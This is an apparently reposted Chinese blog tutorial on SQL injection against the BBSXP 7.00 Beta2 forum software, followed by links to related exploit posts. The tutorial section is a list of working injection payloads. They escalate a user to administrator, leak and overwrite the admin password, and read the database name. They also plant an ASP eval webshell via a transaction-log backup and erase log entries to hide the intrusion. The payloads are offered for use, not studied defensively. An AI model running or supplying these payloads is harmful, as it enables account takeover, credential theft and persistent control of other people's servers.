关于BBSXP 7.00 BETA2 SQL通杀教程

最新推荐文章于 2024-04-30 16:44:46 发布
最新推荐文章于 2024-04-30 16:44:46 发布
阅读量72 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/allyesno/archive/2007/06/25/794307.html
版权
芊芊做的教程
这里记录一下:
  注册---->发帖---->编辑(抓包提交)


define:cnsapc为注册用户
          bug为帖子内容

提升为管理员:
&cnsapc=bug','');update bbsxp_users set userroleid=1 where username='cnsapc'--

获取后台密码"
&cnsapc=bug','');update bbsxp_users set usermail=(select adminpassword from bbsxp_sitesettings) where username='cnsapc'--

修改后台密码:
&cnsapc=bug','');update bbsxp_sitesettings set adminpassword='md5密码'--        注意:bbsxp经过md5加密的密码字母都是大写的

获得数据库名:
&cnsapc=bug','');update bbsxp_users set usermail=db_name() where username='cnsapc'--

log备份拿webshell:
&alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(35)):response.end%>');backup log bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--

清除日志:
&delete * from bbsxp_log where username='cnsapc'--

转载于:https://www.cnblogs.com/allyesno/archive/2007/06/25/794307.html

weixin_30664539
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BBSXP v3.50 SQL正式版
10-09
用户功能,可自由申请论坛 后台增加记录管理员的操作记录 放大管理员权限,可以设定版主 论坛有正、副 版主之分 正版主DIY版块 设定副版主 加强投票功能更具权威性 回收站可以查看
再暴BBSxp 7.0 Beta 2漏洞
weixin_34246551的博客
02-11 56
作者:TTFCT 漏洞存在于文件setup.asp中 第一部份 注册->登陆->发帖->编辑->抓包->改包->提升为管理员->更改后台密码->登陆后台->WEBSHELL 这里我设密码为:ttfct1 ,NC提交,成功提为管理员。用密码:ttfct1登陆后台。成功获取WEBSHELL,成功备份,获取WEBSHEL...
SQL Server 2005自动备份数据库
LisenYang的专栏
04-16 296
Microsoft SQL Server 2005 是一个全面的数据库平台,使用集成的商业智能 (BI)工具提供了企业级的数据管理。Microsoft SQL Server 2005数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。 Microsoft SQL Server 2005 数据引擎是该企业数据管理解决方案的核心
关于BBSxp/LeadBBS的后台上传Webshell的鸡肋防范
weixin_34413103的博客
11-15 150
近弄了两个BBS系统,发现后台传/改Webshell的时候都做了一定限度的防范,使得很多新手不知道如何去传Webshell控制主机.其实这个问题很简单......几分钟就能解决1.BBSXP昨天朋友弄进去一个BBSXP的论坛,这个论坛以前问题多多,制作人(好象是yuzi工作室)很不注意安全的防范,而且对脚本安全基本知识缺乏了解,导致了很多漏洞,而现在已经...
BBSxp 2008 (Build: 8.0.4) Sql Injection Vulnerability
Tr4c3的专栏
03-09 689
============================================首发http://www.nspcn.org,转载请保留此处版权============================================漏洞发布:Tr4c3[at]126[dot]Com影响版本 BBSxp 2008 (Build: 8.0.4)其他版本未看漏洞文件:MoveThread.asp
BBSXP v1.65a(非官方sql版)
10-12
增加社区配色功能 在线人数采用JS调用 上传功能增加无组件上传,自动判断,如果服务器支持SoftArtisans.FileUp则自动采用此组件 修正了一些非IE浏览器不能正常显示的BUG 增加了删除帖子
BBSXP v7.0 Beta 1
03-25
<p>BBSXP7.00beta1WhatsNew </p><p>增加角色功能 </p><p>增加论坛权限功能 </p><p>增加个人博客功能 </p><p>增加个人相册 </p><p>增加帖子评估功能 </p><p>更新头像列表 </p><p>上传模块更新 </p><p>完善风格 </p><p...
BBSXP v4.10 SQL正式版.rar
08-30
4.1更新修正: 帖子审核 用户激活 ...无限分类 广告代码设置 解决缓存冲突 4.0更新修正: 我的**记 增加风格II 增加头像自定于可以使用URL 监狱中的用户7天之后会自动释放 社区新帖、热门帖子、精华帖子等功能 ...
bbsxp2008.rar_bbsxp
09-14
bbsxp 2008测试版论坛!需要的请下载测试,无功能限制。
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
励志做最业余的专业博主,控件产品可以私我~
04-28 769
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
探秘MySQL主从复制的多种实现方式
todoitbo的博客
04-26 1056
本文将深入探讨MySQL主从复制的多种实现方式,包括基于语句、基于行和混合模式等。无论您是初学者还是有经验的数据库管理员,都能通过本文全面了解MySQL主从复制技术的多样化选择,从而提高数据库的可用性和性能。
tableau如何传参数到MySQL数据库
lcl17779740668的博客
04-28 247
tableau如何传参数到MySQL数据库
SpringCloudAlibaba:2.nacos
m0_63040701的博客
04-26 941
Nacos是阿里巴巴开源的服务注册中心以及配置中心Nacos=注册中心Eureka + 服务配置Config + 服务总线Bus。
ubuntu18源码安装postgresql15.2数据库
04-27 425
由于官方的源只能安装到pg10这个版本,整了好一会没有成功就改为源码安装了。
力扣数据库题库学习(4.28日)--1587. 银行账户概要 II
Jesse_Kyrie的博客
04-28 181
对于力扣题1587. 银行账户概要 II的解答,提供解题思路与解题方法,知识点为:1. GROUP BY 2. SUM 3. LEFT JOIN 4. HAVING
MySQL数据库练习(6)
a1677179的博客
04-29 196
MySQL数据库练习(6)
openlayers加载瓦片地图并手动标记坐标点
qq_38196449的博客
04-28 362
这里面有个注释掉的方法,读者可以打开试试,其实就是标记的时候打印经纬度,一般这个值我们都用来存储数据库中。将ol.js、ol.css放在根目录下,当然还有你的瓦片地图也放在根目录下。创建一个项目,普通原生前端项目就行。marker.png是标记坐标点的。
java线上问题排查之磁盘和网络查看分析(二)
最新发布
wayne_youlu的博客
04-30 263
overflowed 标识全连接队列溢出的次数,最前面是0,标识没有队列溢出的情况,网络环境正常。来查看网络是否连接。如果出现下图内容,则证明网络已经连接。
SpringBoot JPA使用
gochenguowei的博客
04-25 1008
是 Spring 框架提供的一个模块,用于简化与关系型数据库的交互和数据访问。它基于JPA(Java Persistence API)标准,并提供了一组易于使用的API和工具,帮助开发人员更轻松地进行数据库操作。通过Spring Data JPA,开发人员可以通过编写简洁的代码来执行常见的 CRUD 操作,同时还支持高级查询、分页、事务管理等功能。它的目标是提供一种更简单、更高效的方式来处理数据库操作,减少开发人员的工作量,并提高应用程序的可维护性和可扩展性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值